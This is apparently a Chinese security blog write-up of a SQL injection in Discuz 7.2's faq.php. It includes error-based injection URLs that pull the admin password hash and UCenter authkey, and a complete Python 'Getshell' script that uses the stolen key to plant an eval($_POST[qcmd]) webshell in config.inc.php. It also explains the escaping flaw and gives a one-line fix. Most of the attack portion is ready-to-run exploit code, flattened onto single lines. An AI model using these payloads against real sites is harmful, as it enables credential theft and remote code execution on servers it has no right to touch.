catalog
1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述
1. 通过获取管理员密码 2. 对管理员密码进行破解。通过在网站对管理密码进行查询,需要带salt,获取的salt要去掉最后一个数字"1"例如下面获取: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71需要查询的是: c6c45f444cf6a41b309c9401ab9a55a7:066ff73. 通过uc_key获取shell4. 进入后台,添加插件获取webshell
Relevant Link:
/vuldb/ssvid-87115/vuldb/ssvid-87114
2. 漏洞触发条件
1.获取数据库版本信息http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%232.获取管理员账户密码http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%233.获取keyhttp://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23//通过error based injection报错获得注入信息
0x1: POC
import sys,urllib,time,math,base64,hashlib,urllib2#contant rawdef fg(kaishi, jieshu, wenben):start = wenben.find(kaishi);if start >= 0:start += len(kaishi);jieshu = wenben.find(jieshu, start);if jieshu >= 0:return wenben[start:jieshu].strip();#microtimedef microtime(get_as_float = False) :if get_as_float:return time.time();else:return '%.8f %d' % math.modf(time.time());#authgetdef get_authcode(string, key = ''):ckey_length = 4;key = hashlib.md5(key).hexdigest();keya = hashlib.md5(key[0:16]).hexdigest();keyb = hashlib.md5(key[16:32]).hexdigest();keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:];#keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]cryptkey = keya + hashlib.md5(keya+keyc).hexdigest();key_length = len(cryptkey);string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string;string_length = len(string);result = '';box = range(0, 256);rndkey = dict();for i in range(0,256):rndkey[i] = ord(cryptkey[i % key_length]);j=0;for i in range(0,256):j = (j + box[i] + rndkey[i]) % 256;tmp = box[i];box[i] = box[j];box[j] = tmp;a=0;j=0;for i in range(0,string_length):a = (a + 1) % 256;j = (j + box[a]) % 256;tmp = box[a];box[a] = box[j];box[j] = tmp;result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]));return keyc + base64.b64encode(result).replace('=', '');#getshell def get_shell(url0,key,host):headers={'Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)','Referer':url0};tm = time.time()+10*3600;tm="time=%d&action=updateapps" %tm;code = urllib.quote(get_authcode(tm,key));url0=url0+"?code="+code;data1='''<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">http://xxx\');eval($_POST[qcmd]);//</item></root>''';try:req=urllib2.Request(url0,data=data1,headers=headers);ret=urllib2.urlopen(req);except:return "error to read";data2='''<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">http://aaa</item></root>''';try:req=urllib2.Request(url0,data=data2,headers=headers);ret=urllib2.urlopen(req);except:return "error";return "OK: "+host+"/config.inc.php | Password = qcmd"; #去掉/config/uc_config.php 为config.inc.php by niubl#define over#url from usersright = len(sys.argv);if right < 2:#noteprint ("============================================================");print ("Discuz <= 7.2 Getshell");print ("Wrote by Airbasic");print ("Usage: py.exe " + sys.argv[0] + " http://localhost/dz");print ("============================================================");raw_input("");sys.exit()url = sys.argv[1];#gourl1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";#authkey1~31wy1 = urllib.urlopen(url1);nr1 = wy1.read();authkey1 = fg("'1:","' for",nr1);#authkey32~64wy2 = urllib.urlopen(url2);nr2 = wy2.read();authkey2 = fg("'1:","' for",nr2);#authkeyauthkey = authkey1+authkey2;#get username and password#none#over#get webshellurl0 = url + "/api/uc.php";host = url;print ("Wrote by Airbasic , GetShell Ok !");print get_shell(url0,authkey,host);raw_input("");
Relevant Link:
/yiyefangzhou24/article/details/36913287http://qqhack8./blog/static/1141479856711246279/
3. 漏洞影响范围
4. 漏洞代码分析
/faq.php
..elseif($action == 'grouppermission') {..//首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids])$groupids = array();foreach($gids as $row) {//将数组中的所有值的第一位取出来放在groupids中$groupids[] = $row[0];/*这里的安全漏洞在于discuz在全局会对GET数组进行addslashes转义,也就是说会将单引号"'"转义成"\'"所以,如果我们的传入的参数是: gids[1]='的话,会被转义成$gids[1]=\',而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是"\",把转义符号取出来了*/}/*在将数据放入sql语句前,通过implodeids函数对$groupids进行处理了一遍就是将刚才的$groupids数组用','分割开,组成一个类似于'1','2','3','4'的字符串返回。但是我们的数组刚取出来一个转义符,它会将这里一个正常的'转义掉,比如这样:'1','\','3','4'这样就把原本的用于闭合的单引号给转义了,使得黑客的注入数据得以"逃逸",也就是产生的注入,我们把报错语句放在3这个位置,就能报错*/$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");$groups = array();..
Relevant Link:
http://simeon./18680/1440000
5. 防御方法
/faq.php
elseif($action == 'grouppermission') {/* 对$gids进行初始化 */$gids = array(); /* */
Relevant Link:
/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXPhttp://simeon./18680/1440000
6. 攻防思考
Copyright (c) LittleHann All rights reserved
如果觉得《discuz /faq.php SQL Injection Vul》对你有帮助,请点赞、收藏,并留下你的观点哦!
